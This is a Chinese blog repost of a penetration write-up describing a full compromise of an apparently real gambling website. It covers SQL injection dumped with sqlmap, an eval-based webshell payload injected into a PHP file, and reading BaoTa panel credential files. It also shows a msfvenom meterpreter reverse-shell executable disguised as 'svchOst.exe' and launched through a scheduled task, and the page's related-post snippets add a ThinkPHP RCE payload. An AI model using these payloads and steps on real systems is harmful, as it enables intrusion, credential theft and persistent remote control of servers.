一次BC站点的GetShell过程

于 2023-03-30 17:24:00 发布
阅读量293 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: 渗透
原文链接:https://mp.weixin.qq.com/s/e-04OATiIejdaeTzINNqXQ
版权

原文

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。

图片

文章正文

0x1 获取源码

首先先常规扫一波目录:

dirsearch -u 'http://x.x.x.x:80/' -e php

并没有发现有源码压缩包,故放弃这个思路,重新审视文章,获取关键字,去github进行搜索,成功找到部分源码,然后开始进行审计。

图片

Github:

图片

0x2 进入后台

通过之前的扫描,可以获取到后台登陆地址。

图片

访问可以看到登陆页面。

图片

没有验证么,果断上一波常规的弱口令FUZZ,无果。那么只能通过源码进行突破了, 首先观察网站的后台鉴权逻辑主要是通过包含common/login_check.php进行判断。

图片

<?php
@session_start(); //后台登陆验证

if(!isset($_SESSION["adminid"])){
    unset($_SESSION["adminid"]);
    unset($_SESSION["login_pwd"]);
    unset($_SESSION["quanxian"]);
    echo "<script>alert('login!!pass');</script>";
    exit;
}else{
    include_once("../../include/mysqlio.php");

那么最直接的思路,就是找到一个没有包含这个文件的地方。

find ./ -name "*.php" |xargs grep -L "login_check.php"

找到文件Get_Odds_1.php, 发现其中的$type参数直接拼接进SQL语句中,存在注入。

图片

正常情况:

图片

输入单引号,出错:

图片

SQLMAP 跑出账号密码,,这里虽然是GET类型的SQL注入,但是直接使用sqlmap的-u参数是不行的,需要使用Burp抓包,保存数据包然后用-r参数。

 sqlmap -r sql.txt -D dsncly -T sys_admin --dump

图片

0x3 GetShell

进入后台,先尝试黑盒,看看有没有上传功能,不过似乎没有找到可用的上传点。

图片

黑盒没找到很明显的办法了,只能进行快速代码审计了,直接全局搜索危险函数eval,file_put_contens、fwrite、fputs等。

图片

可以看到这里写入的文件是php文件,且内容可以通过ta_msg参数进行控制,也没有过滤,只有简单的去除两边的空格,这里务必要自己本地进行构造下,避免出现闭合失败的错误。

构造payload:');eval($_POST[a]);var_dump(md5(1));//;

最终写入到文件gp_db.php

图片

成功GetShell

图片

0x4 宝塔提权

通过phpinfo,可以看到disable_function,同时通过nmap扫描端口,可知目标存在宝塔。

不过幸运的是,shell的权限还是蛮高的,可以浏览到宝塔的目录。

图片

获取宝塔密码:

D:/BtSoft1/panel/data/default.pl

开放端口:

D:/BtSoft1/panel/data/port.pl

后台地址:

D:/BtSoft1/panel/data/admin_path.pl

获取账号:

D:/BtSoft1/panel/data/default.db

通过上面步骤获取到的账号和密码,登陆到后台http://xxxx:8888/Tajl2eP0/

图片

登陆进去之后会弹出强制绑定窗口,可以通过直接访问/site来绕过这个。

下面有两种思路进行提权:

  1. 通过软件管理->已安装,删除禁用函数,来实现命令执行。

图片

图片

  1. 通过宝塔自带的计划任务。

MSF生成木马

msfvenom -p windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai -i 5  LHOST=x.x.x.x LPORT=10001 EXTENSIONS=stdapi,priv  -f exe > svchOst.exe

放到C盘即可,然后添加shell计划任务

图片

ipconfig /all 查看网络状态

图片

简单查看下arp -a和扫描下内网网段的存活情况,并没有连通,故没有继续后续的内网渗透测试。

0x5 总结

本文的渗透过程比较常规,涵盖了从0到1的完整单目标渗透过程,核心在于快速的代码审计能力,由于这个系统开发比较凌乱,所以故不能采用框架的方式去阅读,故采用危险函数定位是一种有效的方法,最后通过利用宝塔的信息,成功获取到最高的权限,完成渗透测试的目标。

本文转自https://forum.butian.net/people/2968,如有侵权,请联系删除。

帅大大的架构之路
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一芯FC1178BC.zip
05-30
我别的不多说,我只想说的是我用了几十个积分下载下来的,希望能帮助大家!可能有些能用,有些不能用啊。请谨慎下载!
简单的BC站点getshell
hackzkaq的博客
03-19 946
更多黑客技能 公众号:暗网黑客 最近来了点任务,做BC,以前没做过只能碰碰运气! 确定目标 主: 通过旁: 信息收集 通过信息收集发现是个tp v5.0.9,此版本存在tp-rce漏洞。 直接通过payload进行测试, Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo() 查找payload,直接打: Post:_method=__construct&filter[]=asser
某网Getshell记录
热门推荐
江左盟的博客
04-28 1万+
信息收集 访问网发现前台为静态页面,且不存在robots.txt文件。然后扫描网目录发现网后台路径adminxxx/login.jsp,且网存在目录遍历漏洞,通过该漏洞可查看到一些身份证、姓名、住址和电话号码等敏感信息,如图: 漏洞发现及利用 访问网后台登录界面,如图: 验证码明文返回 使用sqlmap测试未发现SQL注入漏洞,通过抓包发现验证码直接返回到HTTP Response中,如图: 弱口令 使用Python编写脚本进行字典暴破弱口令,然后喝茶打游戏,一段时间后发现弱口令:admin
一次渗透进学弟服务器Getshell过程
落日领航员の技术栈
09-06 1594
0x00 写在前面 首先说一句,我真的好久 好久 好久 好久 好久没碰过渗透了,一方面是因为太菜,之前从来都没完整的走完一套getshell,半路卡住是常有,做着做着就give up;另一方面是从实习以来一直做的是安全开发相关的工作,以后工作方向大概率也是安全开发而不是攻防。 那为什么我会忽然想起搞学弟的网呢?事情是这样的,之前有指导过学弟怎么搭建一套作业提交系统,然后学弟就开始自己研究,中间过了好久,我也忘了这码事。 今天晚上他忽然来找我 顺便问他要了网址,也想登上去看看是啥样 本来以为就是个简单的作
别致的上传思路导致getshell的案例
zhangge3663的博客
05-31 463
0x01 前言 在某次授权的项目中,客户只要getshell漏洞,经过一番折腾,最后成功拿下shell,完成项目交付,本文将过程和遇到的问题和一些小tips分享给大家。 0x02 SQL注入 经过资产收集,在资产中,找到某个子域名,打开就是个登录框 输入手机号和密码,验证码进行登录,结果数据包中并没有验证码,2333 随手加上' 居然报错了,存在mysql的注入,还报错了物理路径,还有密码列名为usepwd(后面有用到) 要是root权限是不是就美滋滋了,结果多想了,不是root权限.
使用bc45编译ucos-II的配置过程
08-20
文章主要介绍了使用bc45编译ucos-II的配置过程
USB 充电协议,BC1.2
06-09
USB 充电协议,BC1.2
行业资料-交通装置-一种汽车BC柱外加强板零件模具.zip
08-16
行业资料-交通装置-一种汽车BC柱外加强板零件模具.zip
SQLServer2005-BC
04-15
SQLServer2005_BC
node-v0.8.10-sunos-x64.tar.gz
最新发布
05-16
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
【课程设计】实现的金融风控贷款违约预测python源码.zip
05-16
【课程设计】实现的金融风控贷款违约预测python源码.zip
node-v0.10.27-x86.msi
05-16
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
课设毕设基于SSM的高校二手交易平台-LW+PPT+源码可运行.zip
05-16
课设毕设基于SSM的高校二手交易平台--LW+PPT+源码可运行
c++,冒险游戏,可供学习
05-16
冒险游戏,可供学习
node-v0.11.7-sunos-x64.tar.gz
05-16
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
node-v0.8.6-sunos-x64.tar.gz
05-16
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
基于C语言的天气客户端的实现.zip
05-16
基于C语言的天气客户端的实现.zip
internet_download_manager_6.42.3.zip
05-16
internet_download_manager_6.42.3
解决二元一次方程shell脚本
06-03
好的,我可以帮你编写一个解决二元一次方程的 Shell 脚本。以下是代码: ```bash #!/bin/bash echo "请按照格式输入二元一次方程:ax + by = c, dx + ey = f" read -p "请输入 a 的值:" a read -p "请输入 b 的值...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值